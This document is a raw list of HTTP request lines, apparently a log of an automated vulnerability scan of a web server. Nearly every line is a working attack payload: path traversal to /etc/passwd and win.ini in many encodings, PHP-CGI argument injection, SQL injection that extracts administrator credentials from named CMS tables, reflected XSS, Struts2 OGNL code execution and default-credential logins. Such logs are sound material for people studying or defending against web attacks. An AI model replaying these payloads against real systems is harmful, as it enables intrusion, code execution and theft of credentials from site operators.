GET /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /server-status
GET /jmx-console/
GET /..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
GET /..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
GET /web-console/
GET /
GET /%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
GET /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
GET /webscan360noThisFile*~1*/.aspx
POST /cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
POST /cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
POST /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
GET /.../.../.../.../.../.../.../.../windows/win.ini
POST /cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
POST /cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
GET /
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
GET /phpMyAdmin/show_config_errors.php
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
GET /phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
GET /xampp/index.php
GET /etc/passwd
GET /axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
GET /etc/passwd
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
GET /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
GET /?search=just_test_not_find_href
GET /$
GET /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
GET /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
GET /solr/dev/admin/
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
GET /
GET /level/15/exec/-/show/running-config/CR
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
GET /plugins/weathermap/weathermap-cacti-plugin.php
GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
GET /
GET /.../.../.../.../.../.../.../.../etc/passwd
GET /
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
GET /icons/index
GET /icons/small/index
GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
GET /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
GET /
GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
GET /
GET /
GET /%3Cscript%3Ealert(42873).do
GET /
GET /%3Cscript%20s%3Ealert(42873)
GET /
GET /?%22onmouseover='prompt(42873)'bad=%22%3E
GET /
GET /%22%3E%3CsCrIpT%3Eprompt(42873)
GET /compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
GET /?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
GET /?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
GET /
GET /'IHLD
GET /
GET /
GET /
GET /install.php
GET /
GET /install/index.php
GET /fckeditor/editor/dialog/fck_about.html
GET /invoker/EJBInvokerServlet/
GET /extras/curltest.php?url=file://curltest.php
GET /invoker/JMXInvokerServlet/
GET /
GET /.svn/entries
GET /
GET /include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
GET /wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
POST /plus/carbuyaction.php
GET /plus/carbuyaction.php?dopost=return&code=../../index
GET /api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
GET /
GET /
GET /yp/product.php?q=&action=searchlist&where=%23
GET /indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
GET /yp/product.php?pagesize=$%7B@print(md5(42873))%7D
GET /index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
HEAD /flow.php?step=login
GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
GET /
GET /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
GET /
GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /_database/qiye_free.asp
GET /apps/include.php?file=index.php
GET /huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
GET /
GET /wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
POST /manage/login.php
GET /vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
GET /api/upload/swfthumbnail.php?id=../../include/common.inc.php
GET /Inc/conn.asp
GET /
POST /user/reg3.php
GET /News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
GET /celive/js/include.php?departmentid=webscan'&cmseasylive=1
GET /admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
GET /CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
GET /ask/search_ajax.php?q=s%bb%27
GET /yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
GET /yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
GET /web/?id=-1'
GET /huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
GET /js/calendar.php?lang=../js
GET /xampp/showcode.php/showcode.php?showcode=1
GET /index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
POST /login.php
GET /admin/index.asp
GET /Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
GET /user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
GET /phpcms/data/js.php?id=1
GET /index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
GET /plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
GET /user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
GET /Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /?user-getpass-1'
GET /?user-space-1'
POST /index.php
GET /admin/sysadmin_view.asp
GET /include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
POST /index.php?user-getpass
GET /common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
GET /admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
GET /member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
POST /register.php?do=submit
POST /management/login.asp
GET /index.php?-dauto_prepend_file%3d/etc/passwd+-n
POST /tools/ajax.aspx
GET /show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
GET /admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
GET /bom.php?dir=.
GET /phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
GET /myly.aspx?username=test'%20and%20@@version%3E0--
GET /go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
POST /?product-gnotify
POST /Index.action
POST /index.action
POST /login.action
POST /index.php/api/xmlrpc
GET /CVS/Root
GET /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
GET /index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
GET /index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
GET /plugin.php?id=Network114:Network114&ljtype=1%bf%27
GET /group/group.php?id=1%27webscan_draGxn
GET /dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
GET /index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
GET /category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
POST /upload/flow.php?step=update_cart
GET /user.php?act=is_registered&username=%CE%27360webscan%23
GET /do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
GET /do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
GET /zhuti/360webscan'
GET /js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
GET /js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
GET /search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
GET /WEB-INF/web.xml
GET /api.php?action=File&ctrl=download&path=api.php
GET /?/people/360webscan?notification_id-360webscan'
GET /?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
POST /fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
GET /down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /admin/manageAPP.php
GET /index.php?m=poster&c=index&a=poster_click&id=1
GET /yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
GET /?/search/ajax/search_result/search_type-all__q-360webscan'
GET /?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
GET /index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
GET /api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
GET /wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
POST /do/s_rpc.php
POST /new2/s_rpc.php
POST /video/s_rpc.php
POST /photo/s_rpc.php
POST /news/s_rpc.php
GET /plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
GET /page/html/?360webscan'.html
GET /Admin/sqlPlatform/operateSql.aspx
GET /respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
GET /connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
GET /connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
GET /php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
GET /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
GET /e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET http://ec2-72-44-41-82.compute-1.amazonaws.com/proxyres.php
GET /e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
GET /pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
GET /plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
GET /index.php?ac=search&at=taglist&tagkey=a%2527
GET /wap/index.php?ac=search&at=taglist&tagkey=a%2527
POST /ckeditor/samples/sample_posteddata.php
GET /plus/carbuyaction.php?dopost=return&code=../../tags
POST /?cart-ajaxadd
GET /do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
GET /index.php?ac=order&at=list
GET /ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
GET /ajax.php?act=verify_ecv&ecvsn=360scan%27
GET /include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
POST /m.php?m=User&a=doLogin
GET /api.php?act=1&appname=../../core/html/pages/about.html%00
GET /ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
GET /message.php?act=webscan'
GET /link.php?act=go&url=webscan.cn'
GET /showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
GET /showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
GET /include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
GET /group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
GET /admin_aspcms/_content/_tag/aspcms_tag.asp
GET /admin_aspcms/index.asp
POST /admin_aspcms/_style/aspcms_stylefun.asp?action=edit
GET /do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
GET /index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /resin-doc/viewfile/?file=index.jsp
POST /portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
POST /includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
POST /api/uc_client/control/mail.php
GET /api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
GET /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
GET /api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
GET /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
GET /api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
GET /api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
GET /index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
POST /subscribe.php?act=dounsubscribe
POST /productbuy/checkout.asp?11_22.html
GET /data/%23data.asp
POST /manage/Config/BackupRestore.aspx
GET /install/index.php.bak?insLockfile=1
GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
POST /?cart-addGoodsToCart.html
POST /install/index.php?step=active
GET /index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
GET /install/index.php?step=1&insLockfile=1
GET /plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
